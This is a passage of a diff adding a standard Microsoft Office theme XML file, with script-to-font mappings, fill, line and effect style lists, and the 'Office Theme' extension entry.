+        <a:font script="Syrc" typeface="Estrangelo Edessa"/>
+        <a:font script="Orya" typeface="Kalinga"/>
+        <a:font script="Mlym" typeface="Kartika"/>
+        <a:font script="Laoo" typeface="DokChampa"/>
+        <a:font script="Sinh" typeface="Iskoola Pota"/>
+        <a:font script="Mong" typeface="Mongolian Baiti"/>
+        <a:font script="Viet" typeface="Arial"/>
+        <a:font script="Uigh" typeface="Microsoft Uighur"/>
+        <a:font script="Geor" typeface="Sylfaen"/>
+        <a:font script="Armn" typeface="Arial"/>
+        <a:font script="Bugi" typeface="Leelawadee UI"/>
+        <a:font script="Bopo" typeface="Microsoft JhengHei"/>
+        <a:font script="Java" typeface="Javanese Text"/>
+        <a:font script="Lisu" typeface="Segoe UI"/>
+        <a:font script="Mymr" typeface="Myanmar Text"/>
+        <a:font script="Nkoo" typeface="Ebrima"/>
+        <a:font script="Olck" typeface="Nirmala UI"/>
+        <a:font script="Osma" typeface="Ebrima"/>
+        <a:font script="Phag" typeface="Phagspa"/>
+        <a:font script="Syrn" typeface="Estrangelo Edessa"/>
+        <a:font script="Syrj" typeface="Estrangelo Edessa"/>
+        <a:font script="Syre" typeface="Estrangelo Edessa"/>
+        <a:font script="Sora" typeface="Nirmala UI"/>
+        <a:font script="Tale" typeface="Microsoft Tai Le"/>
+        <a:font script="Talu" typeface="Microsoft New Tai Lue"/>
+        <a:font script="Tfng" typeface="Ebrima"/>
+      </a:minorFont>
+    </a:fontScheme>
+    <a:fmtScheme name="Office">
+      <a:fillStyleLst>
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+        <a:gradFill rotWithShape="1">
+          <a:gsLst>
+            <a:gs pos="0">
+              <a:schemeClr val="phClr">
+                <a:lumMod val="110000"/>
+                <a:satMod val="105000"/>
+                <a:tint val="67000"/>
+              </a:schemeClr>
+            </a:gs>
+            <a:gs pos="50000">
+              <a:schemeClr val="phClr">
+                <a:lumMod val="105000"/>
+                <a:satMod val="103000"/>
+                <a:tint val="73000"/>
+              </a:schemeClr>
+            </a:gs>
+            <a:gs pos="100000">
+              <a:schemeClr val="phClr">
+                <a:lumMod val="105000"/>
+                <a:satMod val="109000"/>
+                <a:tint val="81000"/>
+              </a:schemeClr>
+            </a:gs>
+          </a:gsLst>
+          <a:lin ang="5400000" scaled="0"/>
+        </a:gradFill>
+        <a:gradFill rotWithShape="1">
+          <a:gsLst>
+            <a:gs pos="0">
+              <a:schemeClr val="phClr">
+                <a:satMod val="103000"/>
+                <a:lumMod val="102000"/>
+                <a:tint val="94000"/>
+              </a:schemeClr>
+            </a:gs>
+            <a:gs pos="50000">
+              <a:schemeClr val="phClr">
+                <a:satMod val="110000"/>
+                <a:lumMod val="100000"/>
+                <a:shade val="100000"/>
+              </a:schemeClr>
+            </a:gs>
+            <a:gs pos="100000">
+              <a:schemeClr val="phClr">
+                <a:lumMod val="99000"/>
+                <a:satMod val="120000"/>
+                <a:shade val="78000"/>
+              </a:schemeClr>
+            </a:gs>
+          </a:gsLst>
+          <a:lin ang="5400000" scaled="0"/>
+        </a:gradFill>
+      </a:fillStyleLst>
+      <a:lnStyleLst>
+        <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
+          <a:solidFill>
+            <a:schemeClr val="phClr"/>
+          </a:solidFill>
+          <a:prstDash val="solid"/>
+          <a:miter lim="800000"/>
+        </a:ln>
+        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
+          <a:solidFill>
+            <a:schemeClr val="phClr"/>
+          </a:solidFill>
+          <a:prstDash val="solid"/>
+          <a:miter lim="800000"/>
+        </a:ln>
+        <a:ln w="19050" cap="flat" cmpd="sng" algn="ctr">
+          <a:solidFill>
+            <a:schemeClr val="phClr"/>
+          </a:solidFill>
+          <a:prstDash val="solid"/>
+          <a:miter lim="800000"/>
+        </a:ln>
+      </a:lnStyleLst>
+      <a:effectStyleLst>
+        <a:effectStyle>
+          <a:effectLst/>
+        </a:effectStyle>
+        <a:effectStyle>
+          <a:effectLst/>
+        </a:effectStyle>
+        <a:effectStyle>
+          <a:effectLst>
+            <a:outerShdw blurRad="57150" dist="19050" dir="5400000" algn="ctr" rotWithShape="0">
+              <a:srgbClr val="000000">
+                <a:alpha val="63000"/>
+              </a:srgbClr>
+            </a:outerShdw>
+          </a:effectLst>
+        </a:effectStyle>
+      </a:effectStyleLst>
+      <a:bgFillStyleLst>
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+        <a:solidFill>
+          <a:schemeClr val="phClr">
+            <a:tint val="95000"/>
+            <a:satMod val="170000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:gradFill rotWithShape="1">
+          <a:gsLst>
+            <a:gs pos="0">
+              <a:schemeClr val="phClr">
+                <a:tint val="93000"/>
+                <a:satMod val="150000"/>
+                <a:shade val="98000"/>
+                <a:lumMod val="102000"/>
+              </a:schemeClr>
+            </a:gs>
+            <a:gs pos="50000">
+              <a:schemeClr val="phClr">
+                <a:tint val="98000"/>
+                <a:satMod val="130000"/>
+                <a:shade val="90000"/>
+                <a:lumMod val="103000"/>
+              </a:schemeClr>
+            </a:gs>
+            <a:gs pos="100000">
+              <a:schemeClr val="phClr">
+                <a:shade val="63000"/>
+                <a:satMod val="120000"/>
+              </a:schemeClr>
+            </a:gs>
+          </a:gsLst>
+          <a:lin ang="5400000" scaled="0"/>
+        </a:gradFill>
+      </a:bgFillStyleLst>
+    </a:fmtScheme>
+  </a:themeElements>
+  <a:objectDefaults/>
+  <a:extraClrSchemeLst/>
+  <a:extLst>
+    <a:ext uri="{05A4C25C-085E-4340-85A3-A5531E510DB2}">
+      <thm15:themeFamily xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" name="Office Theme" id="{62F939B6-93AF-4DB8-9C6B-D6C7DFDC589F}" vid="{4A3C46E8-61CC-4603-A589-7422A47A8E4A}"/>
+    </a:ext>
+  </a:extLst>
+</a:theme>
 </file>